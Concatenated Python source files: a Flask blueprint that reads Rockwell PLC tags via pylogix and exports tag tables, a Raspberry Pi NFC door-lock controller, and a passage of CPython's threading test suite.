from werkzeug.utils import secure_filename
import csv
import pandas as pd
import numpy as np
from struct import pack, unpack_from # struct parsing for pylogix responses
from blueprints.login import is_login
import blueprints.influxdb
import threading
from flask import copy_current_request_context
import gevent
rockwell_ = Blueprint("rockwell_",__name__)
'''
Rockwell AB PLC via pylogix 0.6.2
'''
# from pylogix import *
from pylogix import PLC
class Timer(object):
def __init__(self, data):
self.PRE = unpack_from('<i', data, 6)[0]
self.ACC = unpack_from('<i', data, 10)[0]
bits = unpack_from('<i', data, 2)[0]
self.EN = get_bit(bits, 31)
self.TT = get_bit(bits, 30)
self.DN = get_bit(bits, 29)
class Motion(object): # Su: Motion type added, modeled on the Timer type (TODO)
def __init__(self, data):
self.PRE = unpack_from('<i', data, 6)[0]
self.ACC = unpack_from('<i', data, 10)[0]
bits = unpack_from('<i', data, 2)[0]
self.EN = get_bit(bits, 31)
self.TT = get_bit(bits, 30)
self.DN = get_bit(bits, 29)
def get_bit(value, bit_number):
'''
Returns the specific bit of a word
'''
mask = 1 << bit_number
if (value & mask):
return True
else:
return False
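# --- Illustrative sketch (editor addition): decoding timer status bits ---
# The Timer/Motion classes above read a 32-bit status word whose top bits are
# EN (bit 31), TT (bit 30) and DN (bit 29). With a hand-built word where only
# EN and DN are set:
def _timer_bits_example():
    status = (1 << 31) | (1 << 29)
    return get_bit(status, 31), get_bit(status, 30), get_bit(status, 29)
    # -> (True, False, True)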
######################### Rockwell ##############################
# module-level state shared across requests (note: a top-level `global` statement is a no-op)
global rockwellip,rockwell_device_list,taglist
rockwellip=''
rockwelldata=()
rockwell_device_list=[]
ttt=''
taglist=[]
@rockwell_.route("/rockwell",methods=["POST","GET"])
@is_login
def rockwell():
## Rockwell AB PLC # equipment in building 108
return render_template("rockwell.html")
@rockwell_.route("/rockwellread",methods=["POST","GET"])
@is_login
def rockwellread(): # tag read handler
# print("readlist")
print(taglist)
### Batch-read helper: read 10 tags per request
def readten(tags_list):
l = len(tags_list) # tag list length; lists longer than 10 must be read in batches to avoid errors
x = l // 10 # number of full batches
y = l % 10 # remainder
a = 0 # index of the current batch
val = [] # accumulated values across all batches
for n in range(x):
if n < x:
val = val + comm.Read(tags_list[10 * a:10 * (a + 1)])
a += 1
n += 1
if n == x and y != 0:
val = val + comm.Read(tags_list[10 * a:10 * a + y])
vall = val
return vall
with PLC() as comm:
tagname=[]
tagvalue=[]
comm.IPAddress=rockwellip
aa=readten(taglist) # read the tags in batches
ttt=time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
print(aa)
for a in aa:
tagname.append(a.TagName)
# Special handling for IO tags: convert to the 0000/0000/0000/0000 form #
# IO width varies; tentatively assume 16 bits. The layout is not fixed and IO module data types are complex.
# TODO: the original program parsed the 500T IO list case by case, mainly because widths and tag names differ
##############################
# if a.TagName == "Local:1:I.Data" or a.TagName == "Local:1:O.Data" :
# if a.Value < 0 :
# a.Value = 65536 + a.Value
# b = ('{:016b}'.format(a.Value))[::-1] # to binary, zero-padded, reversed for IO order
# b=list(b)
# b.insert(4, '/')
# b.insert(9, '/')
# b.insert(14, '/')
# a.Value = ''.join(b)
# tagvalue.append(a.Value)
##############################
# TODO: for testing only, the tag list contains just IO tags (original version above)
# if a.TagName == "Local:1:I.Data" or a.TagName == "Local:1:O.Data" :
# TODO: distinguish digital from analog values; format digital values as binary, leave analog values alone
# TODO: different bit widths need different handling; the 16-bit and 32-bit ranges overlap, so pick the conversion function from the declared width, not the value's magnitude
# TODO: digital values only
# if a.Value >= -32768 and a.Value <= 32767:
## 16-bit DIO conversion helper
def DIO16(a):
if a.Value < 0:
# print(a)
a.Value = 65536 + a.Value # two's-complement to unsigned, matching the original 65536 + a.Value version above
b = ('{:016b}'.format(a.Value))[::-1] # to binary, zero-padded to 16 bits, reversed for IO order
b=list(b)
b.insert(4, '/')
b.insert(9, '/')
b.insert(14, '/')
a.Value = ''.join(b)
return a.Value
# elif a.Value >= -2147483648 and a.Value <= 2147483647:
## 32-bit DIO conversion helper
def DIO32(a):
if a.Value < 0:
a.Value = 4294967296 + a.Value # two's-complement to unsigned for 32-bit values
b = ('{:032b}'.format(a.Value))[::-1] # to binary, zero-padded to 32 bits, reversed for IO order
b = list(b)
b.insert(4, '/')
b.insert(9, '/')
b.insert(14, '/')
b.insert(19, '/')
b.insert(24, '/')
b.insert(29, '/')
b.insert(34, '/')
a.Value = ''.join(b)
return a.Value
# # TODO: convert based on IOtype; the tag table must also be parsed to generate the matching tag names
# if IOtype is 16-bit:
# a.Value=DIO16(a)
# if IOtype is 32-bit:
# a.Value=DIO32(a)
# if IOtype is AIO:
# no binary conversion needed
tagvalue.append(a.Value)
######################################
# TODO: for IO tags only, read without formatting; should analog values be forced positive?
# tagvalue.append(a.Value)
######################################
# Render the results to the front-end page
rockwelldata=dict(zip(tagname,tagvalue))
# return rockwelldata
print(rockwelldata)
# return redirect("#data")
# global influxdata
# influxdata=rockwelldata
return render_template("rockwell.html",rockwelldata=rockwelldata,ttt=ttt) # return a plain response; the old trailing ",rockwelldata" made Flask treat the dict as response headers
def rockwellreadexcel(file):
print("readexcel"+file.filename)
# data = pd.DataFrame(pd.read_excel(file))
# data2 = pd.read_excel(file, usecols=[0], header=None) ## first column, no header; returns an indexed DataFrame
data2 = pd.read_excel(file) ## returns a DataFrame; unknown types are dropped below
data2 = data2.dropna() ## drop abnormal NaN rows
# Tag filtering; not a fully general approach ## drop program names, :C tags and anything outside the known types, keeping the IO tags
# isin() filters out non-IO tags: data2['TagType'].isin(["INT","DINT","BOOL", "REAL","COUNTER","TIMER","DWORD"])
# TODO: Embedded does not follow the rules above and still needs separate handling
data2 = data2[data2['TagType'].isin(["INT", "DINT", "BOOL", "REAL"])
| data2['TagName'].str.contains("Local:")
& ~data2['TagName'].str.contains(":C")
& ~data2['TagType'].str.contains("ASCII|MODULE|Embedded")]
# data2 = data2.reset_index(drop=True) #
# TODO: the lab PLC has no IO modules, so none of the code below applies to it
# The tag table must be parsed to generate the matching table tag names
# Filter tags by IO direction, dropping the useless opposite entries (I rows drop O, O rows drop I); data2.TagType would also work but is less explicit and harder to modify
data2 = data2[(data2['TagType'].str.contains("I") & ~data2['TagType'].str.contains("O"))
| (data2['TagType'].str.contains("O") & ~data2['TagType'].str.contains("I"))]
data2 = data2.reset_index(drop=True) # rows were dropped but the old index remains, so regenerate it
# Build the IOtype column; everything below keys off IOtype to reduce matching and filtering
import re # regular expressions
IOtype = data2['TagType'].to_numpy().tolist()
IOtype = re.findall(r'_(.+?):', str(IOtype))
print(IOtype)
# TODO: for a full tag table, insert must target the matching rows instead of appending in order, otherwise row counts mismatch; consider handling IO and non-IO separately?
data2.insert(2, 'IOtype', IOtype) # add a column for the IO type
# Extract the IO type and decide whether it is multi-channel or single-channel
def IOTYPE(IOtype):
Ch = []
for i in IOtype:
ccc = (''.join(re.findall(r'\d+', str(i)))) # point count (16 or 32 bits) or channel count; findall returns a list, join strips the brackets
if i[0] == "I" or i[0] == "O": # multi-channel when the first character is I or O
Ch.append(ccc)
else:
Ch.append('one' + str(ccc))
# to accommodate one32, keep every Ch value a string, otherwise filtering raises
return Ch
Ch = IOTYPE(IOtype)
data2.insert(3, 'Ch', Ch) # add a column for the channel info
data2.loc[data2.Ch.str.contains("one"), 'TagName'] += '.Data'
data2.loc[~data2.Ch.str.contains("one"), 'TagName'] += ".Ch0Data"
# print(data2)
## two identical modules must each be handled; this nested loop appends the .ChXData rows
ii = 0
for n in Ch: # Ch is still a plain list here, not the Ch column of the DataFrame
if 'one' not in n:
for i in range(1, int(n)): # range(1,8) = 1..7, 8 excluded
# an earlier version wrongly replaced the 0 inside channel number "10"; the replacement field is now 'Ch0'
data2.loc[data2.shape[0]] = [(data2.loc[ii, 'TagName']).replace('Ch0', 'Ch' + str(i)),
data2.loc[ii, 'TagType'], data2.loc[ii, 'IOtype'], data2.loc[ii, 'Ch']]
ii += 1 # index of n, matching each Ch0Data
# print(data2) # the final processed tag table
# TODO: after generation, keep the Ch value to distinguish 16-bit from 32-bit later; ideally this could be dropped
data2 = data2['TagName']
# print(data2)
global taglist
taglist = data2.to_numpy().tolist() # to array, then to list
# taglist = sum(data2, []) # flatten nested lists into the tag list
print(taglist)
@rockwell_.route("/rockwells",methods=["POST","GET"])
@is_login
def rockwells():
with PLC() as comm:
# device discovery
deviceip = []
devicename = []
devices = comm.Discover()
for device in devices.Value:
deviceip.append(device.IPAddress)
devicename.append(device.ProductName + ' ' + device.IPAddress)
global rockwell_device_list
rockwell_device_list = dict(zip(devicename, deviceip)) # build the device dict and store it in the global
scanresult="扫描到"+str(len(rockwell_device_list))+"台设备" # user-facing message: "found N devices"
print(scanresult)
flash(scanresult,"scanresult") # flash a scan-complete notice
return redirect("rockwellscan")
# dev_list=str(device_dict)
# return redirect(url_for(rockwell)) # jump via url_for
# flash(device_dict,"device_dict") # show scan results in the front-end dropdown
# "Start connection" may trigger another device scan, so rockwells and rockwellscan are split: rockwells scans, then redirects to rockwellscan for selection and form handling at /rockwellscan
@rockwell_.route("/rockwellscan",methods=["POST","GET"])
@is_login
def rockwellscan():
if request.method == "POST":
flash("run", "run")
forminfo=request.form.to_dict() ## to_dict() needs the parentheses
# Every form on this page posts here on submit
# forminfo=request.form.get('devicelist') # the retrieved value is a str
# This also covers the tag address form and the influxdb config form; they used to be told apart by dict length
# Now updated to distinguish forms by the Action value
# print(forminfo)
# print(type(forminfo))
# aa=type(forminfo)
######## Each "start connection" actually just grabs the selected device IP and stores it in the global
# The flow was changed so rockwellscan redirects to rockwellscan2 after running, but the full page refresh changes the list~~~~~~~~~~~
if forminfo["Action"]=="rockwellip" : # AB PLC 连接信息 只需要IP
print(forminfo)
aa=(forminfo["devicelist"]).split(" ")
aa=aa[len(aa)-1] #获取ip
global rockwellip # 全局变量 要先声明globa 再修改
rockwellip=aa
ss=("已连接到 "+str(forminfo["devicelist"]))
flash(ss, "scanresult") # 连接完成
# print(rockwellip)
# if (forminfo)=={}: # tag table upload #
if forminfo["Action"]=="file" : #### call readexcel when an excel file is posted
# print("22222222222")
try:
file = request.files.get('file')
file.save('D:/' + secure_filename(file.filename)) ## writes to C: hit Permission denied, so stage on D:; on Linux this should not be an issue
rockwellreadexcel(file)
except Exception as e:
# print(e)
flash(e, "uploadstatus")
else:
# save succeeded
flash("变量表上传成功", "uploadstatus") # user-facing message: "tag table uploaded successfully"
# if len(forminfo) == 2: # tag address
# print(forminfo)
# data = s7read(plc, forminfo["iqm"], forminfo["address"])
# print(data)
# # return data
if forminfo["Action"]=="influxdb": # influxdb连接信息
print(forminfo)
influxdbip = forminfo["influxdb"]
token = forminfo["token"]
measurement = forminfo["measurement"]
cycle = forminfo["cycle"]
flash("写入InfluxDB", "influx")
# 添加线程 todo 上下文处理/线程的外部停止
# from flask import current_app
# from main import app
# app_ctx = app.app_context()
# app_ctx.push()
# with app.test_request_context("/rockwellscan"):
# print(current_app.name)
# influxdbip = forminfo["influxdb"]
# token = forminfo["token"]
# measurement = forminfo["measurement"]
# cycle = forminfo["cycle"]
# print(current_app)
# app.app_context().push()
t1 = threading.Thread(target= blueprints.influxdb.influxDB, args=(influxdbip, token, measurement, cycle,))
# t1.setDaemon(True)
t1.start()
# app_ctx.pop()
# influxDB(influxdbip, token, measurement, cycle)
# return redirect("#")
# flash(rockwell_device_list,"dev_list") #flash只能传递字符串
# return jsonify()
# return redirect(url_for("rockwell"))
return render_template("rockwell.html",dev_list=rockwell_device_list)#设备扫描结果显示到前端页面下拉列表
## 定向页面逻辑,此处要在rockwellscan中处理POST请求
## 前端调用后台程序 href=“xx” 通过路由调用,还有没有别的方法 采用url_for()跳转 参考登录函数处理方法
# return redirect("#")
@rockwell_.route("/rockwell_get_all_vars")
@is_login
#### Fetch all tags and offer them for download # TODO: strip program names, write the tag read function; repeated tag-table fetches keep a stale timestamp (bug)
def rockwell_get_all_vars(): #
# print("111111111111111")
with PLC() as comm:
# print("111111111111")
####### Cannot re-fetch the tag table by repeated clicks? Repeated clicks skip the loop and just download the attachment?? Refreshing the tag table requires another "start connection" ##############
print(rockwellip)
if rockwellip=='':
print("Select a device IP address first")
else:
print(rockwellip)
comm.IPAddress = rockwellip # global
# comm.IPAddress="192.168.100.200"
# print("2222222222")
try:
tags = comm.GetTagList() # returns a Response object that must be parsed
comm.Close()
except Exception as e:
print(e)
# missing a return here; error handling for failed reads is incomplete
else:
tagname=[]
tagtype=[]
head=["TagName","TagType"]
for t in tags.Value:
tagname.append(t.TagName)
tagtype.append(t.DataType)
taglist = pd.DataFrame({'tagname': tagname, 'tagtype': tagtype}) # format with pandas
# print(taglist)
tt = datetime.datetime.now().strftime('%Y-%m-%d %H-%M-%S') # timestamp tag
filepath=("D:/Taglist "+tt+".xlsx")
print(filepath)
## stage the tag-table file for download and automatic reads
taglist.to_excel(filepath, encoding='utf-8', index=False, header=head) # write to excel
## tag-table file download
return send_file(filepath,as_attachment=True) # send the file to the front end for download; simpler than send_from_directory
# return send_from_directory(filepath,as_attachment=True) #
|
nfc_lock.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import RPi.GPIO as GPIO
import time
import signal
import sys
import nfc
import threading
import os
import binascii
from neopixel import *
import argparse
from db import DataBase
from oled import OLED_Display
from datetime import datetime # for the time-based indicator lamp off (ysmt)
class NFC_Kagisys():
"""サーボモータの制御"""
def __init__(self):
self.BUTTON_ON=19
self.BUTTON_OFF=26
self.BUTTON_SET=20
self.MODE = "Default"
"""基本設定とスレッドの呼び出し"""
#基本的なセッティング
self.db = DataBase()
self.oled = OLED_Display()
self.oled.display([self.MODE], ["en"])
signal.signal(signal.SIGINT, self.exit_handler)
th = threading.Thread(target=self.run, name="th", args=())
th.setDaemon(True)
th.start()
#Neopixel
# Create NeoPixel object with appropriate configuration.
self.strip = Adafruit_NeoPixel(1, 18, 800000, 10, False, 255, 0)
# Initialize the library (must be called once before other functions).
self.strip.begin()
# buttons
GPIO.setmode(GPIO.BCM)
self.errLED = [13]
GPIO.setup(self.errLED, GPIO.OUT)
GPIO.setup(self.BUTTON_ON, GPIO.IN)
GPIO.setup(self.BUTTON_OFF, GPIO.IN)
GPIO.setup(self.BUTTON_SET, GPIO.IN)
GPIO.add_event_detect(self.BUTTON_ON, GPIO.RISING, callback=self.pushed_on, bouncetime=3000)
GPIO.add_event_detect(self.BUTTON_OFF, GPIO.RISING, callback=self.pushed_off, bouncetime=3000)
GPIO.add_event_detect(self.BUTTON_SET, GPIO.RISING, callback=self.pushed_register, bouncetime=3000)
while True:
time.sleep(1000)
def exit_handler(self, signal, frame):
"""終了時処理"""
print('Exit nfc')
self.clf.close()
GPIO.cleanup()
sys.exit(0)
def run(self):
"""メイン"""
self.clf = nfc.ContactlessFrontend('tty:AMA0:pn532')
#繰り返し
while True:
target_req = nfc.clf.RemoteTarget("212F")
target_req.sensf_req = bytearray.fromhex("0000030000")
target_res = self.clf.sense(target_req,iterations=10,interval=0.1)
if target_res is not None:
tag = nfc.tag.activate(self.clf,target_res)
tag.sys = 3
idm = binascii.hexlify(tag.idm)
self.touched(idm)
time.sleep(3)
print("release")
else:
time.sleep(1)
def touched(self,tag):
"""タッチされたときの処理"""
#idの照合
#tag_id = tag.identifier.encode("hex").upper()
tag_id=tag
print(tag_id)
self.db.addTouchedLog(tag_id)
# fetch the toggle state
toggle = self.get_toggle()
if self.MODE == "Default":
if not self.db.checkIDm(tag_id):
# the tag does not match any registered ID
self.write_not_auth_id(tag_id)
self.led(toggle)
self.oled.display([self.MODE, tag_id], ["en", "ja"])
print("No matching Key")
print("setting OK.")
return
if toggle == "lock":
#鍵の解錠
self.Dopen()
elif toggle == "open":
#鍵の施錠
self.Dlock()
else:
print("error ! please check file path")
elif self.MODE == "Register":
if self.db.checkIDm(tag_id):
self.MODE = "Authorization"
self.oled.display([self.MODE, "登録するカードをタッチ"], ["en", "ja"])
else:
self.MODE = "Default"
self.oled.display([self.MODE, "登録失敗"], ["en", "ja"])
if toggle == "lock":
self.colorWipe(self.strip, Color(255, 0, 0)) #red
else:
self.colorWipe(self.strip, Color(20, 255, 35)) #green
elif self.MODE == "Authorization":
if not self.db.checkIDm(tag_id):
self.MODE = "Default"
self.db.addNewIDm(tag_id, "TestUser")
self.oled.display([self.MODE, "登録成功"], ["en", "ja"])
for i in range(2):
self.colorWipe(self.strip, Color(249, 243, 1))
time.sleep(.5)
self.colorWipe(self.strip, Color(0, 0, 0))
time.sleep(.5)
else:
self.MODE = "Default"
self.oled.display([self.MODE, "登録失敗"], ["en", "ja"])
if toggle == "lock":
self.colorWipe(self.strip, Color(255, 0, 0)) #red
else:
self.colorWipe(self.strip, Color(20, 255, 35)) #green
def pushed_on(self, sw):
print("ON button pressed")
toggle = self.get_toggle()
if toggle == "lock":
# currently locked -> unlock
self.Dopen()
def pushed_off(self, sw):
print("OFF button pressed")
toggle = self.get_toggle()
if toggle == "open":
# currently open -> lock
self.Dlock()
def pushed_register(self, sw):
self.MODE = "Register"
self.colorWipe(self.strip, Color(249, 243, 1))
self.oled.display([self.MODE, "登録済みカードをタッチ"], ["en", "ja"])
def get_toggle(self):
"""toggleデータの取得"""
os.chdir("/home/pi/project/kagisys_logic/")
file_ = open("kagisys.toggle")
result = file_.read()
file_.close()
print(result)
return result
def write_not_auth_id(self,id):
"""write not to auth id"""
write_string = "not authed : " + id
os.chdir("/home/pi/project/kagisys_logic/")
file_ = open('not_auth.log', 'a')
file_.write(write_string)
file_.close()
def Dopen(self):
os.system("open_kagi")
self.colorWipe(self.strip, Color(20, 255, 35)) #green
self.oled.display([self.MODE, "OPEN"], ["en", "en"])
def Dlock(self):
os.system("lock_kagi")
self.colorWipe(self.strip, Color(255, 0, 0)) #red
self.oled.display([self.MODE, "LOCK"], ["en", "en"])
def led(self, toggle):
for i in range(8):
if(i%2==0):
GPIO.output(self.errLED, 0)
else:
GPIO.output(self.errLED, 1)
time.sleep(0.5)
if 7 <= datetime.now().hour < 20: # light the lamp only between 07:00 and 20:00
if toggle == "lock":
GPIO.output(self.errLED, 1)
else:
GPIO.output(self.errLED, 0)
else:
GPIO.output(self.errLED, 0)
def colorWipe(self, strip, color, wait_ms=50):
"""Wipe color across display a pixel at a time."""
for i in range(strip.numPixels()):
strip.setPixelColor(i, color)
strip.show()
time.sleep(wait_ms/1000.0)
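# --- Illustrative sketch (editor addition): the toggle-file protocol ---
# get_toggle() treats kagisys.toggle as a tiny state store holding either
# "lock" or "open". A minimal writer for the same convention (hypothetical
# helper, not called above):
def _write_toggle(state, path="/home/pi/project/kagisys_logic/kagisys.toggle"):
    assert state in ("lock", "open")
    with open(path, "w") as f:
        f.write(state)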
if __name__ == '__main__':
NFC_Kagisys()
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import verbose, strip_python_stderr, import_module
from test.script_helper import assert_python_ok
import random
import re
import sys
_thread = import_module('_thread')
threading = import_module('threading')
import _testcapi
import time
import unittest
import weakref
import os
from test.script_helper import assert_python_ok, assert_python_failure
import subprocess
from test import lock_tests
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertTrue(self.nrunning.get() <= 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertTrue(self.nrunning.get() >= 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertEqual(t.ident, None)
self.assertTrue(re.match(r'<TestThread\(.*, initial\)>', repr(t)))
t.start()
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertTrue(not t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertFalse(t.ident is None)
self.assertTrue(re.match(r'<TestThread\(.*, stopped -?\d+\)>',
repr(t)))
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertFalse(threading.currentThread().ident is None)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
_thread.start_new_thread(f, ())
done.wait()
self.assertFalse(ident[0] is None)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256kB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1MB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
try:
result = set_async_exc(ctypes.c_long(tid), exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertTrue(not t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_running_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
t.isAlive()
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertFalse('daemon' in repr(t))
t.daemon = True
self.assertTrue('daemon' in repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
sys.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
self.addCleanup(t.join)
pid = os.fork()
if pid == 0:
os._exit(1 if t.is_alive() else 0)
else:
pid, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
